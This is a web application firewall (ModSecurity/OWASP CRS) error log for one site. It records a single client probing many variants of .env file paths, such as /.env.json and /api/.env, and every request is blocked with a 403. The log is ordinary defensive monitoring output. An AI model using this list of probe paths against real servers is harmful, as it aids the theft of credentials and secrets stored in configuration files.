[Mon May 11 14:09:52.880529 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHHEFchVQ3tCn0m9OpAowAAAQ4"]
[Mon May 11 14:09:52.880727 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHHEFchVQ3tCn0m9OpAowAAAQ4"]
[Mon May 11 14:09:52.881014 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env1"] [unique_id "agHHEFchVQ3tCn0m9OpAowAAAQ4"]
[Mon May 11 14:09:53.054566 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHHEVchVQ3tCn0m9OpApQAAAQ4"]
[Mon May 11 14:09:53.054950 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHHEVchVQ3tCn0m9OpApQAAAQ4"]
[Mon May 11 14:09:53.055128 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHHEVchVQ3tCn0m9OpApQAAAQ4"]
[Mon May 11 14:09:53.055403 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env2"] [unique_id "agHHEVchVQ3tCn0m9OpApQAAAQ4"]
[Mon May 11 14:09:53.253827 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHHEVchVQ3tCn0m9OpAqAAAAQ4"]
[Mon May 11 14:09:53.254219 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHHEVchVQ3tCn0m9OpAqAAAAQ4"]
[Mon May 11 14:09:53.254430 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHHEVchVQ3tCn0m9OpAqAAAAQ4"]
[Mon May 11 14:09:53.254684 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env_copy"] [unique_id "agHHEVchVQ3tCn0m9OpAqAAAAQ4"]
[Mon May 11 14:09:53.457921 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHHEVchVQ3tCn0m9OpAqQAAAQ4"]
[Mon May 11 14:09:53.458328 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHHEVchVQ3tCn0m9OpAqQAAAQ4"]
[Mon May 11 14:09:53.458555 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHHEVchVQ3tCn0m9OpAqQAAAQ4"]
[Mon May 11 14:09:53.458844 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.txt"] [unique_id "agHHEVchVQ3tCn0m9OpAqQAAAQ4"]
[Mon May 11 14:09:53.642774 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHHEVchVQ3tCn0m9OpAqwAAAQ4"]
[Mon May 11 14:09:53.643202 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHHEVchVQ3tCn0m9OpAqwAAAQ4"]
[Mon May 11 14:09:53.643402 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHHEVchVQ3tCn0m9OpAqwAAAQ4"]
[Mon May 11 14:09:53.643663 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.json"] [unique_id "agHHEVchVQ3tCn0m9OpAqwAAAQ4"]
[Mon May 11 14:09:53.856740 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHHEVchVQ3tCn0m9OpArQAAAQ4"]
[Mon May 11 14:09:53.857122 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHHEVchVQ3tCn0m9OpArQAAAQ4"]
[Mon May 11 14:09:53.857320 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHHEVchVQ3tCn0m9OpArQAAAQ4"]
[Mon May 11 14:09:53.857569 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.yaml"] [unique_id "agHHEVchVQ3tCn0m9OpArQAAAQ4"]
[Mon May 11 14:09:54.090454 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHHElchVQ3tCn0m9OpArgAAAQ4"]
[Mon May 11 14:09:54.091010 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHHElchVQ3tCn0m9OpArgAAAQ4"]
[Mon May 11 14:09:54.091289 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHHElchVQ3tCn0m9OpArgAAAQ4"]
[Mon May 11 14:09:54.091611 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.yml"] [unique_id "agHHElchVQ3tCn0m9OpArgAAAQ4"]
[Mon May 11 14:09:54.332419 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsAAAAQ4"]
[Mon May 11 14:09:54.332985 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsAAAAQ4"]
[Mon May 11 14:09:54.333276 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsAAAAQ4"]
[Mon May 11 14:09:54.333606 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsAAAAQ4"]
[Mon May 11 14:09:54.517932 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsgAAAQ4"]
[Mon May 11 14:09:54.518517 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsgAAAQ4"]
[Mon May 11 14:09:54.518799 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsgAAAQ4"]
[Mon May 11 14:09:54.519176 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHHElchVQ3tCn0m9OpAsgAAAQ4"]
[Mon May 11 14:09:54.751743 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtAAAAQ4"]
